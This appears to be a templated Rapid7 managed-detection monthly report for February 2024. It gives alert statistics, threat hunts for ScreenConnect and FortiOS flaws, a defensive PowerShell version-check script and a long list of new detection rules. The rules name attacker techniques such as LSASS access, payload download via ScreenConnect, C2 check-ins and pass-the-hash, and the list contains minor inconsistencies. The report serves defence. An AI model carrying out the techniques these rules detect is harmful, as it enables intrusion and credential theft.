Key Service Statistics


Executive Summary

Rapid7’s Managed Detection and Response (MDR) service generated 112 alerts while monitoring for malicious activity in Company Name’s environment in February. None of these alerts identified malicious activity that required incident response during this period.


Total Logs collected

3,518,304,611

Alerts Generated

112

Incident Reports

0



Collected Log Data

The following table identifies the data sources from which InsightIDR collected logs last month, the log set in InsightIDR log search where the logs are stored, and the number of log files collected per data source. The MDR team uses this data when investigating an incident.

You can also view your logs in InsightIDR by clicking Log Search from the left menu.


Alerts

The MDR Security Operations Center performed in-depth validation of 112 alerts by priority. The MDR team applied user behavior analytics to retrace the user and activity behind each alert. As part of this analysis, the MDR team reviewed domains and URLs accessed by users, processes executed by users, historical logon activity, and system roles associated with the alerts.

For more information about alert priorities and closed alert dispositions, go to the Key Terms and Definitions tab.

Closed Alerts by Priority

Alerts by Priority (chart): Critical Priority, High Priority, Medium Priority, Low Priority.

List of Closed Alerts

This table lists the alerts that were closed during the month of February. The table is generated by matching signatures to logs and events from Company Name’s environment.

Closed Alerts by Disposition

Alerts by Disposition (chart): Not Reported, Reported.

Incidents

MDR did not respond to any security incidents during the month of February.


Collected Endpoint Data

Artifact Type               Operating System   Count
Running Processes           Windows            76,344
Prefetch                    Windows            64,300
Registry-Based Persistence  Windows            336,612
Scheduled Tasks             Windows            90,827
Services                    Windows            269,796
Crontab                     Linux              98
Running Processes           Linux              2,814
Sudoers                     Linux              164
SUID Binaries               Linux              700
Kernel Modules              Linux              940
Authorized Keys             Linux              9,038
Running Processes           Mac                1,670
Sudoers                     Mac                68
SUID Binaries               Mac                68
Authorized Keys             Mac                5
Crontab                     Mac                0
Services                    Mac                2
Kernel Extensions           Mac                809


Threat Hunts Performed

During the month of February, MDR’s threat hunters performed 2 hunts in Company Name’s environment. Details of these threat hunts can be found in the table below. Had evidence of compromise been identified as a result of these hunts, the incident response process would have been initiated (see the ‘Incidents’ section of this report).

Hunt Name: Find Running ScreenConnect Versions
Hunt Timeframe: 2024-02-20 - 2024-02-22
Hunt Description: On February 19, 2024, ConnectWise disclosed two vulnerabilities in its ScreenConnect remote access software. Both affect ScreenConnect version 23.9.7 and earlier. At the time of disclosure neither vulnerability had a CVE assigned; as of February 21, CVEs have been assigned to both issues in ConnectWise’s advisory: CVE-2024-1709, an authentication bypass using an alternate path or channel (CVSS 10), and CVE-2024-1708, a path traversal issue (CVSS 8.4). Upon public disclosure, the R7 MDR Threat Hunt team initiated a hunt across the managed customer base to identify the presence of ScreenConnect, based on the visibility R7 has through the Insight platform. The hunt produced a list of assets running specific ScreenConnect versions to help clients upgrade to patched versions (23.9.8 and later). Impacted clients were notified immediately.

Hunt Name: Find Fortinet SSL VPN Appliances
Hunt Timeframe: 2024-02-09 - 2024-02-12
Hunt Description: On February 8, 2024, Fortinet disclosed multiple critical vulnerabilities affecting FortiOS, the operating system that runs on FortiGate appliances, including their SSL VPN. The critical vulnerabilities include CVE-2024-21762, an out-of-bounds write in the SSL VPN daemon (sslvpnd) that could allow a remote, unauthenticated attacker to execute arbitrary code or commands via specially crafted HTTP requests. Upon public disclosure, the R7 MDR Threat Hunt team initiated a hunt across the managed customer base to identify FortiOS devices, based on the visibility R7 has through firewall and ingress authentication event logs. Impacted clients were notified immediately.
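As an added example of the check the ScreenConnect hunt performs, this PowerShell inventories ScreenConnect installs on a single Windows host from the Uninstall registry keys and compares each DisplayVersion against 23.9.8, the first release that fixes CVE-2024-1709 and CVE-2024-1708. It is not Rapid7’s hunt logic. The ‘ScreenConnect*’ display-name pattern, the assumption that the server’s entry is named exactly ‘ScreenConnect’ while clients are ‘ScreenConnect Client (…)’, and the 23.9.8 threshold are assumptions to verify against ConnectWise’s current advisory. The fix applies to the server component; client entries are reported because each points at a server that may still need patching.

```powershell
# Added example, not Rapid7's hunt: inventory ScreenConnect installs on this host
# from the Uninstall registry keys and flag versions below 23.9.8 (first release
# fixing CVE-2024-1709 / CVE-2024-1708). Name pattern and threshold are assumptions.
$FixedVersion = [version]'23.9.8'

function Test-ScreenConnectVulnerable {
    param([string]$DisplayVersion)
    # Missing or unparsable version strings return $null so they are reported,
    # not silently treated as patched.
    if ([string]::IsNullOrEmpty($DisplayVersion)) { return $null }
    $v = $null
    if (-not [version]::TryParse($DisplayVersion, [ref]$v)) { return $null }
    # [version] comparison: 23.9.7.8817 -lt 23.9.8 is $true, 23.9.8.8811 -lt 23.9.8 is $false.
    return ($v -lt $FixedVersion)
}

function Get-ScreenConnectInstalls {
    $uninstallKeys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
    )
    Get-ItemProperty -Path $uninstallKeys -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName -like 'ScreenConnect*' } |
        ForEach-Object {
            # Assumed naming: the server registers as 'ScreenConnect',
            # deployed clients as 'ScreenConnect Client (<id>)'.
            $component = if ($_.DisplayName -eq 'ScreenConnect') { 'Server' } else { 'Client' }
            [pscustomobject]@{
                ComputerName    = $env:COMPUTERNAME
                DisplayName     = $_.DisplayName
                Component       = $component
                DisplayVersion  = $_.DisplayVersion
                InstallLocation = $_.InstallLocation
                Vulnerable      = Test-ScreenConnectVulnerable $_.DisplayVersion
            }
        }
}

# Self-check of the comparison on constructed version strings (not real inventory data).
foreach ($s in '23.9.7.8817', '23.9.8.8811', '24.1.0.0', 'unknown') {
    '{0,-12} vulnerable={1}' -f $s, (Test-ScreenConnectVulnerable $s)
}

Get-ScreenConnectInstalls | Format-Table -AutoSize
```

Run it through your endpoint management tooling (or Invoke-Command against a host list) and collect the objects centrally; a $null in the Vulnerable column means the version could not be read and the host needs a manual look rather than being dropped from the list.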


Newly Created Rules and Suppressions

In February, Rapid7 MDR’s Threat Intelligence and Detection Engineering (TIDE) team created 376 new detection rules. The TIDE team also implemented 1 suppression, tuning the rule listed under “Rules with new Suppressions.” Each month, TIDE researches new detections to increase coverage and implements suppressions to raise the fidelity of existing detections, which improves coverage of Company Name’s environment.

Newly Created Rules

Name Description
Attack Technique: Registry Modification by Black Hunt Ransomware This detection identifies the use of ‘reg.exe’ to change the value of registry keys that reside under HKCU. It primarily targets the registry keys modified by Black Hunt ransomware, which makes several modifications to the Windows registry to disable security measures, alter system functionality, and potentially limit user control over the system.
Attacker Technique - OpenSSH service installed via PowerShell This detection identifies commands used to install OpenSSH on Windows and Linux systems. OpenSSH is used to sign in to systems remotely and securely; it comes pre-installed on some systems and is disabled by default on others unless a user enables it. Threat actors may use compromised valid accounts to log in to remote machines over OpenSSH.
Attacker Technique - Rundll32 Running DLL in Root of AppData Temp Folder This detection identifies ‘RunDLL32.exe’ executing a DLL file in the root of ProgramData directory. ProgramData is a common staging directory for malicious actors.
Attacker Technique - Rundll32 Running Registered COM Class This detection identifies ‘RunDLL32.exe’ invoking a registered COM class. Malicious actors have been observed installing a COM class and later invoking it to run malicious DLLs.
Attacker Technique - Suspicious Nltest Execution via ScreenConnect On February 19, 2024, ConnectWise disclosed two vulnerabilities in their ScreenConnect remote access software. Both vulnerabilities affect ScreenConnect versions 23.9.7 and earlier. This detection identifies suspicious command execution originating from ScreenConnect, specifically Nltest, a Windows utility for interacting with Active Directory Domain Services that malicious actors can use to gather information about an Active Directory network.
Attacker Technique - Suspicious Powershell Execution via ScreenConnect On February 19, 2024, ConnectWise disclosed two vulnerabilities in their ScreenConnect remote access software. Both vulnerabilities affect ScreenConnect versions 23.9.7 and earlier. This detection identifies PowerShell downloading an executable file or invoking the Invoke-WebRequest cmdlet via ScreenConnect.
Attacker Technique: ConnectWise ScreenConnect Exploit Adding a New User On February 19, 2024, ConnectWise disclosed two vulnerabilities in their ScreenConnect remote access software. Both vulnerabilities affect ScreenConnect versions 23.9.7 and earlier. This detection identifies the creation of new files within the path C: as part of the publicly released exploit.
For Rapid7 to alert on this rule, customers must ensure that the host’s Advanced Security Audit Policy Settings enable success auditing for Object Access > File System (the subcategory that generates Windows Event ID 4663 for file and directory access; the Kernel Object subcategory covers kernel objects such as mutexes, not files) and that a SACL is set on ScreenConnect’s directory. More information on how to configure the Advanced Audit policy is available at:
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn319064(v=ws.11)
Crowdstrike Falcon - A domain lookup matched a CrowdStrike Intelligence indicator A domain lookup matched a CrowdStrike Intelligence indicator.
Crowdstrike Falcon - A domain matched a Custom Intelligence Indicator (Custom IOC) A domain matched a Custom Intelligence Indicator (Custom IOC).
Crowdstrike Falcon - A domain matched a Custom Intelligence Indicator (Custom IOC) with low severity A domain matched a Custom Intelligence Indicator (Custom IOC) with low severity.
Crowdstrike Falcon - A driver was loaded from a suspicious location, by a suspicious process, or in a suspicious manner A driver was loaded from a suspicious location, by a suspicious process, or in a suspicious manner. Check that the driver and loading process is expected.
Crowdstrike Falcon - A file appears to be imitating a standard OS or otherwise benign filename and/or launched from an unusual location A file appears to be imitating a standard OS or otherwise benign filename and/or launched from an unusual location. This might be to masquerade malware. Review the file.
Crowdstrike Falcon - A file with a known ransomware extension was created A file with a known ransomware extension was created.
Crowdstrike Falcon - A file written to the file-system matches CrowdStrike Intelligence’s medium confidence threshold for malicious files A file written to the file-system matches CrowdStrike Intelligence’s medium confidence threshold for malicious files. It might be malware and/or part of an adversary’s toolkit. Review the file.
Crowdstrike Falcon - A file written to the file-system meets the File Analysis ML algorithm’s high-confidence threshold for malware A file written to the file-system meets the File Analysis ML algorithm’s high-confidence threshold for malware.
Crowdstrike Falcon - A file written to the file-system meets the File Analysis ML algorithm’s lowest-confidence threshold for malware A file written to the file-system meets the File Analysis ML algorithm’s lowest-confidence threshold for malware.
Crowdstrike Falcon - A file written to the file-system meets the File Analysis ML algorithm’s medium-confidence threshold for malware A file written to the file-system meets the File Analysis ML algorithm’s medium-confidence threshold for malware.
Crowdstrike Falcon - A file written to the file-system meets the machine learning-based on-sensor AV protection’s lowest-confidence threshold for malicious files A file written to the file-system meets the machine learning-based on-sensor AV protection’s lowest-confidence threshold for malicious files.
Crowdstrike Falcon - A file written to the file-system surpassed a low-confidence adware detection threshold A file written to the file-system surpassed a low-confidence adware detection threshold.
Crowdstrike Falcon - A file written to the file-system surpassed a lowest-confidence adware detection threshold A file written to the file-system surpassed a lowest-confidence adware detection threshold.
Crowdstrike Falcon - A file written to the file-system surpassed a medium-confidence adware detection threshold A file written to the file-system surpassed a medium-confidence adware detection threshold.
Crowdstrike Falcon - A Java application launched from an unusual location A Java application launched from an unusual location. This might be a Java-based remote administration tool (RAT). Investigate the process tree.
Crowdstrike Falcon - A low level detection was triggered on this process for testing purposes A low level detection was triggered on this process for testing purposes.
Crowdstrike Falcon - A machine has been infected and is controlled by a malicious party A machine has been infected and is controlled by a malicious party.
Crowdstrike Falcon - A MD5 hash matched a Custom Intelligence Indicator (Custom IOC) with informational severity A MD5 hash matched a Custom Intelligence Indicator (Custom IOC) with informational severity.
Crowdstrike Falcon - A MD5 hash matched a Custom Intelligence Indicator (Custom IOC) with low severity A MD5 hash matched a Custom Intelligence Indicator (Custom IOC) with low severity.
Crowdstrike Falcon - A plist file was modified A plist file was modified. Adversaries can modify plist files to achieve privilege escalation or establish persistence. Please check the file to determine if the modifications were expected.
Crowdstrike Falcon - A PowerShell process appears to be creating a Windows Management Instrumentation (WMI) class A PowerShell process appears to be creating a Windows Management Instrumentation (WMI) class. Some adversaries store malicious payloads in WMI classes to maintain persistence. Review the process tree and delete the WMI class from the host.
Crowdstrike Falcon - A PowerShell process attempted to load a payload from a registry key A PowerShell process attempted to load a payload from a registry key. The registry key is likely a malicious payload. Investigate the process tree and registry key.
Crowdstrike Falcon - A PowerShell process with suspicious command line arguments launched under an unusual parent process A PowerShell process with suspicious command line arguments launched under an unusual parent process. This is often a malicious dropper. Review the command line.
Crowdstrike Falcon - A PowerShell script related to this process is likely malicious or shares characteristics with known malicious scripts A PowerShell script related to this process is likely malicious or shares characteristics with known malicious scripts. Review the script.
Crowdstrike Falcon - A process appears to have been exploited to facilitate lateral movement between hosts in the environment A process appears to have been exploited to facilitate lateral movement between hosts in the environment. Both hosts should be investigated for further signs of compromise.
Crowdstrike Falcon - A process attempted to create a shell via wscript under Windows Management Instrumentation (WMI) A process attempted to create a shell via wscript under Windows Management Instrumentation (WMI). An adversary can use the shell to execute commands remotely. Review the process tree.
Crowdstrike Falcon - A process attempted to send obfuscated data, possibly to a command and control server A process attempted to send obfuscated data, possibly to a command and control server. Adversaries can use this to blend in with normal network traffic and evade detection. Review the process tree.
Crowdstrike Falcon - A process attempted to uninstall the Falcon sensor using Windows Management Instrumentation (WMI) A process attempted to uninstall the Falcon sensor using Windows Management Instrumentation (WMI). This is an unusual way to uninstall the sensor. If this is unexpected, review the process tree.
Crowdstrike Falcon - A process attempted to write a malicious payload A process attempted to write a malicious payload. Review the process tree.
Crowdstrike Falcon - A process containing a reflectively loaded DLL opened a handle to LSASS A process containing a reflectively loaded DLL opened a handle to LSASS. Adversaries often use this to evade detection. Review the process tree.
Crowdstrike Falcon - A process decoded or otherwise deobfuscated the contents of a file A process decoded or otherwise deobfuscated the contents of a file. Adversaries can use this to shape follow-on behavior. Review the process tree.
Crowdstrike Falcon - A process engaged in network activity with a remote destination known for malicious activity A process engaged in network activity with a remote destination known for malicious activity. Investigate events around the remote connection.
Crowdstrike Falcon - A process has escalated privileges, this could be as a result of an adversary’s attempt to bypass access controls or as part of legitimate system administration A process has escalated privileges, this could be as a result of an adversary’s attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.
Crowdstrike Falcon - A process has modified the permissions or attributes of a file A process has modified the permissions or attributes of a file. Adversaries may modify file or directory permissions or attributes to evade access control lists (ACLs) and access protected files. Please check the process tree to determine if this modification was expected.
Crowdstrike Falcon - A process has scheduled an unusual task A process has scheduled an unusual task. Some malware schedules tasks to maintain persistence. If this task unexpected, review it.
Crowdstrike Falcon - A process has written a known EICAR test file A process has written a known EICAR test file. Review the files written by the triggered process.
Crowdstrike Falcon - A process launched that shares characteristics with a cryptocurrency miner A process launched that shares characteristics with a cryptocurrency miner. If this is unexpected, review the process tree.
Crowdstrike Falcon - A process launched that’s likely related to a malicious macro from a lure document associated with a phishing attack A process launched that’s likely related to a malicious macro from a lure document associated with a phishing attack. Investigate the process tree to find the originating file and look for similar files delivered to other hosts.
Crowdstrike Falcon - A process launched with a filename, path, and/or arguments associated with known adware A process launched with a filename, path, and/or arguments associated with known adware. If this activity is unexpected, review the file and investigate the host for other signs of adware.
Crowdstrike Falcon - A process made a suspicious remote procedure call (RPC) A process made a suspicious remote procedure call (RPC). Malware abuses RPC to migrate to other processes and evade detection. Review the process tree and locate the origin of the RPC.
Crowdstrike Falcon - A process manually started the sudo password timer A process manually started the sudo password timer
Crowdstrike Falcon - A process modified a firewall rule in an unusual way A process modified a firewall rule in an unusual way. This might provide malware network access to remote command and control. Review the command line.
Crowdstrike Falcon - A process tree contains indications of a phishing attack A process tree contains indications of a phishing attack. An email opened around the time of the activity is likely responsible. Investigate the process tree to find the originating file and look for similar files delivered to other hosts.
Crowdstrike Falcon - A productivity application unexpectedly wrote and ran an executable A productivity application unexpectedly wrote and ran an executable. Review the executable and investigate the process tree.
Crowdstrike Falcon - A script was blocked from running because it matches a hash blacklisted by your prevention policy A script was blocked from running because it matches a hash blacklisted by your prevention policy. For more info, see Configuration > Prevention Hashes.
Crowdstrike Falcon - A SHA256 hash matched a Custom Intelligence Indicator (Custom IOC) A SHA256 hash matched a Custom Intelligence Indicator (Custom IOC).
Crowdstrike Falcon - A SHA256 hash matched a Custom Intelligence Indicator (Custom IOC) with informational severity A SHA256 hash matched a Custom Intelligence Indicator (Custom IOC) with informational severity.
Crowdstrike Falcon - A SHA256 hash matched a Custom Intelligence Indicator (Custom IOC) with low severity A SHA256 hash matched a Custom Intelligence Indicator (Custom IOC) with low severity.
Crowdstrike Falcon - A suspicious process was identified by CrowdStrike A suspicious process was identified by CrowdStrike. Review the process tree.
Crowdstrike Falcon - A suspicious script launched that might be related to malicious activity A suspicious script launched that might be related to malicious activity. A variety of malware families use this technique. Review the script.
Crowdstrike Falcon - A user request to service classified as anomalous behavior pattern based on learned profile and user similarity A user request to service classified as anomalous behavior pattern based on learned profile and user similarity.
Crowdstrike Falcon - Access from blocklisted location Access from blocklisted location
Crowdstrike Falcon - Access from multiple locations concurrently Access from multiple locations concurrently
Crowdstrike Falcon - An application installed itself along with other bundled software An application installed itself along with other bundled software. This process is likely related to adware but might be malicious. Review the applications installed.
Crowdstrike Falcon - An application that doesn’t usually schedule tasks scheduled one An application that doesn’t usually schedule tasks scheduled one. Malware schedule tasks to maintain persistence. If this task is unexpected, investigate the process responsible for scheduling the task.
Crowdstrike Falcon - An executable is running from a location in which no executables should be running An executable is running from a location in which no executables should be running.
Crowdstrike Falcon - An executable ran that contained a right-to-left override character in its file name and was flagged as suspicious An executable ran that contained a right-to-left override character in its file name and was flagged as suspicious.
Crowdstrike Falcon - An executable ran that had a non-executable file extension An executable ran that had a non-executable file extension.
Crowdstrike Falcon - An executable ran that had a suspicious file name containing right-to-left characters An executable ran that had a suspicious file name containing right-to-left characters.
Crowdstrike Falcon - An executable was run with a contradicting file extension An executable was run with a contradicting file extension
Crowdstrike Falcon - An executable was written with a suspicious file name containing a right-to-left override character An executable was written with a suspicious file name containing a right-to-left override character.
Crowdstrike Falcon - An executable was written with a suspicious file name containing whitespace characters before an executable extension An executable was written with a suspicious file name containing whitespace characters before an executable extension.
Crowdstrike Falcon - An executable was written with a suspicious filename containing right-to-left characters An executable was written with a suspicious filename containing right-to-left characters
Crowdstrike Falcon - An executable with trailing white space was executed An executable with trailing white space was executed
Crowdstrike Falcon - An MD5 Hash matched a Custom Intelligence Indicator (Custom IOC) An MD5 Hash matched a Custom Intelligence Indicator (Custom IOC).
Crowdstrike Falcon - An unexpected process ran svchost.exe An unexpected process ran svchost.exe. Adversaries can masquerade malware as a system process to evade detection. Review the executable.
Crowdstrike Falcon - Anomalous certificate-based authentication Anomalous certificate-based authentication
Crowdstrike Falcon - Anomalous RPC (account discovery) Anomalous RPC (account discovery)
Crowdstrike Falcon - Anomalous RPC (remote services) Anomalous RPC (remote services)
Crowdstrike Falcon - Anomalous RPC (scheduled task) Anomalous RPC (scheduled task)
Crowdstrike Falcon - Anomalous RPC (valid accounts) Anomalous RPC (valid accounts)
Crowdstrike Falcon - Credential Scanning (Active Directory) Credential Scanning (Active Directory)
Crowdstrike Falcon - Credential Scanning (web-based) Credential Scanning (web-based)
Crowdstrike Falcon - DC PsExec execution DC PsExec execution
Crowdstrike Falcon - Document Access In A Detection Summary Event
Crowdstrike Falcon - Excessive activity from multiple endpoints Excessive activity from multiple endpoints
Crowdstrike Falcon - Excessive activity to multiple endpoints Excessive activity to multiple endpoints
Crowdstrike Falcon - Executable Written In A Detection Summary Event
Crowdstrike Falcon - Falcon Overwatch has identified suspicious activity Falcon Overwatch has identified suspicious activity. This has been raised for your awareness and should be investigated as normal.
Crowdstrike Falcon - For evaluation only - benign, no action needed For evaluation only - benign, no action needed.
Crowdstrike Falcon - Identity verification approve Identity verification approve
Crowdstrike Falcon - Identity verification denied Identity verification denied
Crowdstrike Falcon - Identity verification timed out Identity verification timed out
Crowdstrike Falcon - Mshta attempted to load a likely malicious command line from a registry entry using an obfuscated script Mshta attempted to load a likely malicious command line from a registry entry using an obfuscated script. Review the script and registry key.
Crowdstrike Falcon - Multiple processes in a session accessed linux data files Multiple processes in a session accessed linux data files. This could be an attempt to access sensitive data. Investigate the session and process tree.
Crowdstrike Falcon - Name or location of a file was manipulated or abused in order to evade detection Name or location of a file was manipulated or abused in order to evade detection. Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users. Please check the process tree to determine if these files are malicious or if this was expected behaviour.
Crowdstrike Falcon - Nslookup was launched in an unusual way Nslookup was launched in an unusual way. An adversary might be using nslookup to map your environment or locate command and control. Investigate the process tree.
Crowdstrike Falcon - NTLM relay activity NTLM relay activity
Crowdstrike Falcon - Password brute force attack (Active Directory) Password brute force attack (Active Directory)
Crowdstrike Falcon - Password brute force attack (web-based) Password brute force attack (web-based)
Crowdstrike Falcon - Policy rule match (access) Policy rule match (access)
Crowdstrike Falcon - Policy rule match (detection) Policy rule match (detection)
Crowdstrike Falcon - Privilege escalation (Azure service principal) Privilege escalation (Azure service principal)
Crowdstrike Falcon - Privilege escalation (endpoint) Privilege escalation (endpoint)
Crowdstrike Falcon - Privilege escalation (user) Privilege escalation (user)
Crowdstrike Falcon - Ransomware file operation activity has been observed occurring over a remote SMB connection Ransomware file operation activity has been observed occurring over a remote SMB connection. Investigate the observed user account for signs of compromise and review the file operations for encryption and data impact.
Crowdstrike Falcon - Rundll32 has likely been abused by malware to launch a malicious payload Rundll32 has likely been abused by malware to launch a malicious payload. While the rundll32 process is benign, the DLL file it’s loading is likely malicious. Review the file loaded by rundll32.
Crowdstrike Falcon - Rundll32 launched a suspended process Rundll32 launched a suspended process. This might be malware hijacking system processes and launching suspended processes as hollowing targets. Investigate the process tree and the source of the injection.
Crowdstrike Falcon - Some activity may indicate start of reconnaissance Some activity may indicate start of reconnaissance
Crowdstrike Falcon - Suspicious domain replication Suspicious domain replication
Crowdstrike Falcon - Suspicious lateral movement Suspicious lateral movement
Crowdstrike Falcon - Suspicious LDAP search (AD-CS reconnaissance) Suspicious LDAP search (AD-CS reconnaissance)
Crowdstrike Falcon - Suspicious LDAP search (Kerberos misconfiguration) Suspicious LDAP search (Kerberos misconfiguration)
Crowdstrike Falcon - Suspicious machine alteration Suspicious machine alteration
Crowdstrike Falcon - Suspicious protocol implementation (pass the hash) Suspicious protocol implementation (pass the hash)
Crowdstrike Falcon - Suspicious protocol implementation (valid accounts) Suspicious protocol implementation (valid accounts)
Crowdstrike Falcon - Svchost launched with unusual arguments Svchost launched with unusual arguments. This occasionally results from applications misusing svchost, but might be malware preparing to hollow out the process or abusing it to launch a malicious payload. Investigate the process tree.
Crowdstrike Falcon - Techniques: Non-Standard Port Techniques: Non-Standard Port
Crowdstrike Falcon - The networksetup tool applied the localhost as a proxy, which is often indicative of a remote man in the middle attack The networksetup tool applied the localhost as a proxy, which is often indicative of a remote man in the middle attack
Crowdstrike Falcon - The runC binary was replaced by a process on the host The runC binary was replaced by a process on the host. Please review the configuration.
Crowdstrike Falcon - The Windows startup folder launched an unusual file The Windows startup folder launched an unusual file. Malware might have previously set persistence by copying a malicious payload to the startup folder. Review the file.
Crowdstrike Falcon - This activity classified as anomalous behavior pattern based on baseline and user similarity This activity classified as anomalous behavior pattern based on baseline and user similarity.
Crowdstrike Falcon - This file meets the Adware/PUP algorithm’s high-confidence threshold This file meets the Adware/PUP algorithm’s high-confidence threshold.
Crowdstrike Falcon - This file meets the Adware/PUP algorithm’s low-confidence threshold This file meets the Adware/PUP algorithm’s low-confidence threshold.
Crowdstrike Falcon - This file meets the Adware/PUP algorithm’s lowest-confidence threshold | This file meets the Adware/PUP algorithm’s lowest-confidence threshold.
Crowdstrike Falcon - This file meets the Adware/PUP algorithm’s medium-confidence threshold | This file meets the Adware/PUP algorithm’s medium-confidence threshold.
Crowdstrike Falcon - This file meets the Adware/PUP Anti-malware ML algorithm’s high-confidence threshold | This file meets the Adware/PUP Anti-malware ML algorithm’s high-confidence threshold.
Crowdstrike Falcon - This file meets the Adware/PUP Anti-malware ML algorithm’s lowest-confidence threshold | This file meets the Adware/PUP Anti-malware ML algorithm’s lowest-confidence threshold.
Crowdstrike Falcon - This file meets the Adware/PUP Anti-malware ML algorithm’s medium-confidence threshold | This file meets the Adware/PUP Anti-malware ML algorithm’s medium-confidence threshold.
Crowdstrike Falcon - This file meets the Behavioral Analysis ML algorithm’s low-confidence threshold for malware | This file meets the Behavioral Analysis ML algorithm’s low-confidence threshold for malware. It might be malicious and/or part of an adversary’s toolkit. Review the file.
Crowdstrike Falcon - This file meets the File Analysis ML algorithm’s lowest-confidence threshold for malware | This file meets the File Analysis ML algorithm’s lowest-confidence threshold for malware.
Crowdstrike Falcon - This file meets the File Analysis ML algorithm’s medium-confidence threshold for malware | This file meets the File Analysis ML algorithm’s medium-confidence threshold for malware.
Crowdstrike Falcon - This file meets the machine learning-based on-sensor AV protection’s low confidence threshold for Adware/PUP files | This file meets the machine learning-based on-sensor AV protection’s low confidence threshold for Adware/PUP files.
Crowdstrike Falcon - This file meets the machine learning-based on-sensor AV protection’s low confidence threshold for malicious files | This file meets the machine learning-based on-sensor AV protection’s low confidence threshold for malicious files.
Crowdstrike Falcon - This file meets the machine learning-based on-sensor AV protection’s lowest confidence threshold for Adware/PUP files | This file meets the machine learning-based on-sensor AV protection’s lowest confidence threshold for Adware/PUP files.
Crowdstrike Falcon - This file meets the machine learning-based on-sensor AV protection’s medium confidence threshold for malicious files | This file meets the machine learning-based on-sensor AV protection’s medium confidence threshold for malicious files.
Crowdstrike Falcon - This file written to disk meets the Behavioral Analysis ML algorithm’s low-confidence threshold for malware | This file written to disk meets the Behavioral Analysis ML algorithm’s low-confidence threshold for malware. It might be malicious and/or part of an adversary’s toolkit. Review the file.
Crowdstrike Falcon - This file written to disk meets the machine learning-based on-sensor AV protection’s low confidence threshold for Adware/PUP files | This file written to disk meets the machine learning-based on-sensor AV protection’s low confidence threshold for Adware/PUP files.
Crowdstrike Falcon - This file written to disk meets the machine learning-based on-sensor AV protection’s lowest confidence threshold for Adware/PUP files | This file written to disk meets the machine learning-based on-sensor AV protection’s lowest confidence threshold for Adware/PUP files.
Crowdstrike Falcon - This SHA256 hash was prevented from executing in accordance with your organization’s policy | This SHA256 hash was prevented from executing in accordance with your organization’s policy.
Crowdstrike Falcon - Unusual access to an application | Unusual access to an application
Crowdstrike Falcon - Unusual login to an endpoint | Unusual login to an endpoint
Crowdstrike Falcon - Unusual service access to an endpoint | Unusual service access to an endpoint
Crowdstrike Falcon - Use of stale endpoint | Use of stale endpoint
Crowdstrike Falcon - Use of stale user account | Use of stale user account
Crowdstrike Falcon - User seen coming from, and accessing to, multiple locations, that is anomalous to the user baseline and to peer users | User seen coming from, and accessing to, multiple locations, that is anomalous to the user baseline and to peer users. Such behavior may indicate potential lateral movement, domain reconnaissance, credentials theft and other risks. Falcon monitors the activity and escalates severity if necessary.
Crowdstrike Falcon - Using an advanced attack, the entire domain was compromised | Using an advanced attack, the entire domain was compromised. The malicious party can access any resource on the domain.
Crowdstrike Falcon - XDR Detection Summary Event | XDR Detection Summary Event
ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE BunnyLoader 3.0 CID Checkin | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE BunnyLoader 3.0 DBID Checkin | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE BunnyLoader 3.0 Echo Checkin | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE BunnyLoader 3.0 Heartbeat Checkin | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE BunnyLoader 3.0 Heartbeat Response | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE BunnyLoader 3.0 Initial Checkin | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE BunnyLoader 3.0 Initial Checkin Response | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE BunnyLoader 3.0 Tasking Checkin | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE BunnyLoader 3.0 Tasking Response | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE DuckTail APT CnC Activity (GET) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE FormBook CnC Checkin (GET) M5 | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Java/Unknown CnC Checkin | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Lazarus Group Backdoor CnC Checkin M1 | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Lazarus Group Backdoor CnC Checkin M2 | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Lazarus Group Comebacker Backdoor CnC Checkin | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE MacOS RustDoor Related Activity M1 (POST) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE MacOS RustDoor Related Activity M2 (POST) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Ducktail Domain (123online .uk in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
